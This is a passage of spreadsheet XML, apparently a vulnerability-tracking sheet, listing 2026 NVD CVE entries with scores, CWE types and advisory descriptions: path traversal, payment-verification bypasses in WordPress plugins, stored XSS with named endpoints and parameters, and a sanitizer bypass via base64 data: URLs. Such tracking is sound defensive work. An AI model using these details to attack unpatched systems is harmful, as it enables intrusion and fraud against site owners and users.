      <c r="M256" s="5" t="inlineStr"/>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P256" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q256" s="5" t="inlineStr"/>
      <c r="R256" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="S256" s="5" t="inlineStr">
        <is>
          <t>An Origin Validation Error in the middleware of the connect-xcors npm package allows an attacker to bypass origin verification and perform a cross domain authenticated request.</t>
        </is>
      </c>
      <c r="T256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18825</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52749</t>
        </is>
      </c>
      <c r="D257" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E257" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F257" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="inlineStr"/>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K257" s="5" t="inlineStr"/>
      <c r="L257" s="5" t="inlineStr"/>
      <c r="M257" s="5" t="inlineStr"/>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P257" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q257" s="5" t="inlineStr"/>
      <c r="R257" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S257" s="5" t="inlineStr">
        <is>
          <t>The Kaon AR2140X router improperly issues session cookies in responses to unauthenticated HTTP requests. This vulnerability allows a remote attacker to obtain a valid session identifier without providing credentials, resulting in an authentication bypass. With this access, the attacker can perform unauthorized actions on upgrade-related functionalities. These actions can be abused to force the router to issue GET requests to arbitrarily chosen domains.
This issue was identified in firmware versions up to 4.2.17. Status of newer versions remains unknown.</t>
        </is>
      </c>
      <c r="T257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52749</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55156</t>
        </is>
      </c>
      <c r="D258" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E258" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F258" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="inlineStr"/>
      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K258" s="5" t="inlineStr"/>
      <c r="L258" s="5" t="inlineStr"/>
      <c r="M258" s="5" t="inlineStr"/>
      <c r="N258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P258" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q258" s="5" t="inlineStr"/>
      <c r="R258" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S258" s="5" t="inlineStr">
        <is>
          <t>Token Optimizer MCP measures token savings per AI coding agent, optimizes context, and shares a live local knowledge graph across 16 CLI clients. Prior to version 5.1.0, the dashboard HTTP server in token-optimizer-mcp exposes /api/session-summary and /api/session-events with no authentication middleware — any network-accessible client can reach them without credentials. Both handlers concatenate the caller-supplied sessionId query parameter directly into a filesystem path via path.join, and Node.js normalizes .. segments at resolution time, allowing an unauthenticated attacker to read any .jsonl file reachable from the server's filesystem. This issue has been patched in version 5.1.0.</t>
        </is>
      </c>
      <c r="T258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55156</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82932</t>
        </is>
      </c>
      <c r="D259" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E259" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F259" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="inlineStr"/>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr"/>
      <c r="K259" s="5" t="inlineStr"/>
      <c r="L259" s="5" t="inlineStr"/>
      <c r="M259" s="5" t="inlineStr"/>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P259" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q259" s="5" t="inlineStr"/>
      <c r="R259" s="5" t="inlineStr">
        <is>
          <t>CWE-923</t>
        </is>
      </c>
      <c r="S259" s="5" t="inlineStr">
        <is>
          <t>mH-DEVELOPER smart home module does not load any firewall rules at startup. This leaves all listening services, including SSH, HTTP, WebSocket, and Node-RED, fully exposed on the LAN without access control. Any client on the same network can reach every service.
This issue was fixed in version 3.0.30</t>
        </is>
      </c>
      <c r="T259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82932</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86838</t>
        </is>
      </c>
      <c r="D260" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E260" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F260" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="inlineStr"/>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K260" s="5" t="inlineStr"/>
      <c r="L260" s="5" t="inlineStr"/>
      <c r="M260" s="5" t="inlineStr"/>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P260" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q260" s="5" t="inlineStr"/>
      <c r="R260" s="5" t="inlineStr">
        <is>
          <t>CWE-472</t>
        </is>
      </c>
      <c r="S260" s="5" t="inlineStr">
        <is>
          <t>The Bookly WordPress plugin before 28.3 does not validate client-supplied booking quantity values on the server before computing the appointment total, allowing unauthenticated users to reduce the total to zero and book paid services for free while bypassing the payment step.</t>
        </is>
      </c>
      <c r="T260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86838</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89300</t>
        </is>
      </c>
      <c r="D261" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E261" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F261" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="inlineStr"/>
      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K261" s="5" t="inlineStr"/>
      <c r="L261" s="5" t="inlineStr"/>
      <c r="M261" s="5" t="inlineStr"/>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P261" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q261" s="5" t="inlineStr"/>
      <c r="R261" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S261" s="5" t="inlineStr">
        <is>
          <t>The WP Verify API WordPress plugin through 1.0.0 does not have any authorisation check in one of its REST routes, allowing unauthenticated users to insert arbitrary data into its own database table, as well as to make the site send templated verification emails to arbitrary email addresses. The route is not rate limited either.</t>
        </is>
      </c>
      <c r="T261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89300</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89411</t>
        </is>
      </c>
      <c r="D262" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E262" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F262" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="inlineStr"/>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K262" s="5" t="inlineStr"/>
      <c r="L262" s="5" t="inlineStr"/>
      <c r="M262" s="5" t="inlineStr"/>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P262" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q262" s="5" t="inlineStr"/>
      <c r="R262" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S262" s="5" t="inlineStr">
        <is>
          <t>The Paymattic WordPress plugin from 4.6.20 before 4.6.26 does not verify that a confirmed Stripe payment belongs to the order it is applied to, allowing unauthenticated users to mark an arbitrary pending order as paid by confirming a smaller payment of their own against it.</t>
        </is>
      </c>
      <c r="T262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89411</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92996</t>
        </is>
      </c>
      <c r="D263" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E263" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F263" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="inlineStr"/>
      <c r="I263" s="5" t="inlineStr"/>
      <c r="J263" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K263" s="5" t="inlineStr"/>
      <c r="L263" s="5" t="inlineStr"/>
      <c r="M263" s="5" t="inlineStr"/>
      <c r="N263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O263" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P263" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q263" s="5" t="inlineStr"/>
      <c r="R263" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S263" s="5" t="inlineStr">
        <is>
          <t>The Verge3D WordPress plugin from 4.1.0 through 4.13.0 does not verify with the payment provider that a payment was actually made, and does not check order ownership, allowing unauthenticated users to mark any order as paid.</t>
        </is>
      </c>
      <c r="T263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92996</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73641</t>
        </is>
      </c>
      <c r="D264" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E264" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F264" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="inlineStr"/>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr"/>
      <c r="K264" s="5" t="inlineStr"/>
      <c r="L264" s="5" t="inlineStr"/>
      <c r="M264" s="5" t="inlineStr"/>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P264" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q264" s="5" t="inlineStr"/>
      <c r="R264" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S264" s="5" t="inlineStr">
        <is>
          <t>Dayforce Payroll is vulnerable to Reflected XSS in multiple endpoints. An attacker can prepare a specially crafted URL that, when opened, results in arbitrary JavaScript execution in the victim's browser.
Because vendor contact attempts were unsuccessful, the vulnerability has only been confirmed in version R2026.2.0 but may also affect other versions.</t>
        </is>
      </c>
      <c r="T264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73641</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80358</t>
        </is>
      </c>
      <c r="D265" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E265" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F265" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="inlineStr"/>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr">
        <is>
          <t>dell</t>
        </is>
      </c>
      <c r="K265" s="5" t="inlineStr"/>
      <c r="L265" s="5" t="inlineStr"/>
      <c r="M265" s="5" t="inlineStr"/>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P265" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q265" s="5" t="inlineStr"/>
      <c r="R265" s="5" t="inlineStr">
        <is>
          <t>CWE-1191</t>
        </is>
      </c>
      <c r="S265" s="5" t="inlineStr">
        <is>
          <t>Dell Boot Optimized Server Storage (BOSS), versions prior to 2.2.13.2038, contains an On-Chip Debug and Test Interface With Improper Access Control vulnerability in the SMCU on 17G BOSS-N1 controllers. An unauthenticated attacker with physical access could potentially exploit this vulnerability, leading to Unauthorized access.</t>
        </is>
      </c>
      <c r="T265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80358</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94285</t>
        </is>
      </c>
      <c r="D266" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E266" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F266" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="inlineStr"/>
      <c r="I266" s="5" t="inlineStr"/>
      <c r="J266" s="5" t="inlineStr"/>
      <c r="K266" s="5" t="inlineStr"/>
      <c r="L266" s="5" t="inlineStr"/>
      <c r="M266" s="5" t="inlineStr"/>
      <c r="N266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O266" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P266" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q266" s="5" t="inlineStr"/>
      <c r="R266" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S266" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read in libX11's byte-oriented codeset parser in libX11 before 1.8.14 could be used by malicious X servers to crash attached X clients.</t>
        </is>
      </c>
      <c r="T266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94285</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102269</t>
        </is>
      </c>
      <c r="D267" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E267" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F267" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="inlineStr"/>
      <c r="I267" s="5" t="inlineStr"/>
      <c r="J267" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K267" s="5" t="inlineStr"/>
      <c r="L267" s="5" t="inlineStr"/>
      <c r="M267" s="5" t="inlineStr"/>
      <c r="N267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O267" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P267" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q267" s="5" t="inlineStr"/>
      <c r="R267" s="5" t="inlineStr">
        <is>
          <t>CWE-180</t>
        </is>
      </c>
      <c r="S267" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. Prior to 2.14.0, PyJWT signature segment is affected because signature segment decoding accepts characters outside the canonical Base64URL representation. This occurs when non-Base64URL characters are appended to a valid compact JWS signature segment. As a result, base64url_decode produces the same signature bytes for different serialized segments. Consequently, raw-token revocation checks can fail to recognize an equivalent modified token. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102269</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7170</t>
        </is>
      </c>
      <c r="D268" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E268" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F268" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="inlineStr"/>
      <c r="I268" s="5" t="inlineStr"/>
      <c r="J268" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K268" s="5" t="inlineStr"/>
      <c r="L268" s="5" t="inlineStr"/>
      <c r="M268" s="5" t="inlineStr"/>
      <c r="N268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O268" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P268" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q268" s="5" t="inlineStr"/>
      <c r="R268" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S268" s="5" t="inlineStr">
        <is>
          <t>Stored Cross-Site Scripting (XSS) in TPVEnlanube affecting the following endpoint and parameter:
  *  CVE-2026-7170: parameter 'vendor_store_name' in the endpoint  '/administrator/index.php?pshop_mode=admin&amp;page=store.store_add&amp;option=com_virtuemart&amp;vendor_id=[ID]'.
Successful exploitation of this vulnerability could allow an authenticated attacker to inject malicious code and execute it in users' browsers without their consent.</t>
        </is>
      </c>
      <c r="T268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7170</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7171</t>
        </is>
      </c>
      <c r="D269" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E269" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F269" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G269" s="5" t="inlineStr"/>
      <c r="H269" s="5" t="inlineStr"/>
      <c r="I269" s="5" t="inlineStr"/>
      <c r="J269" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K269" s="5" t="inlineStr"/>
      <c r="L269" s="5" t="inlineStr"/>
      <c r="M269" s="5" t="inlineStr"/>
      <c r="N269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O269" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P269" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q269" s="5" t="inlineStr"/>
      <c r="R269" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S269" s="5" t="inlineStr">
        <is>
          <t>Stored Cross-Site Scripting (XSS) in TPVEnlanube affecting the following endpoint and parameter:
  *  CVE-2026-7171: parameter 'Apellido 1' in the endpoint  '/administrator/index.php?page=admin.user_add&amp;user_id=45&amp;option=com_virtuemart'.
Successful exploitation of this vulnerability could allow an authenticated attacker to inject malicious code and execute it in users' browsers without their consent.</t>
        </is>
      </c>
      <c r="T269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7171</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7172</t>
        </is>
      </c>
      <c r="D270" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E270" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F270" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@incibe.es</t>
        </is>
      </c>
      <c r="G270" s="5" t="inlineStr"/>
      <c r="H270" s="5" t="inlineStr"/>
      <c r="I270" s="5" t="inlineStr"/>
      <c r="J270" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K270" s="5" t="inlineStr"/>
      <c r="L270" s="5" t="inlineStr"/>
      <c r="M270" s="5" t="inlineStr"/>
      <c r="N270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O270" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P270" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q270" s="5" t="inlineStr"/>
      <c r="R270" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S270" s="5" t="inlineStr">
        <is>
          <t>Stored Cross-Site Scripting (XSS) in TPVEnlanube affecting the following endpoint and parameter:
  *  CVE-2026-7172: parameter 'Nombre Completo' in the endpoint  '/administrator/index.php?option=com_virtuemart&amp;page=admin.user_list'.
Successful exploitation of this vulnerability could allow an authenticated attacker to inject malicious code and execute it in users' browsers without their consent.</t>
        </is>
      </c>
      <c r="T270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7172</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100370</t>
        </is>
      </c>
      <c r="D271" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E271" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F271" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G271" s="5" t="inlineStr"/>
      <c r="H271" s="5" t="inlineStr"/>
      <c r="I271" s="5" t="inlineStr"/>
      <c r="J271" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K271" s="5" t="inlineStr"/>
      <c r="L271" s="5" t="inlineStr"/>
      <c r="M271" s="5" t="inlineStr"/>
      <c r="N271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O271" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P271" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q271" s="5" t="inlineStr"/>
      <c r="R271" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S271" s="5" t="inlineStr">
        <is>
          <t>DOMSanitizer is a DOM/SVG/MathML Sanitizer for PHP 7.3+. Prior to version 1.0.15, the isDangerousUrl() method is responsible for rejecting dangerous URL values in the href and xlink:href attributes. The weakness is that "javascript:" is rejected as a scheme, while "data:" is rejected only when the literal substring onload appears in the URL value (/^data:.*onload/i). Because data: payloads are routinely Base64-encoded, the dangerous content (&lt;script&gt;, event handlers, etc.) is invisible to that substring test. A URL such as data:text/html;base64,… therefore survives in href / xlink:href, even though the decoded payload is active markup. This is an incomplete input-validation / sanitization defect in the sanitizer itself. This issue has been patched in version 1.0.15.</t>
        </is>
      </c>
      <c r="T271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100370</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C272" s="5" t="inlineStr">
        <is>
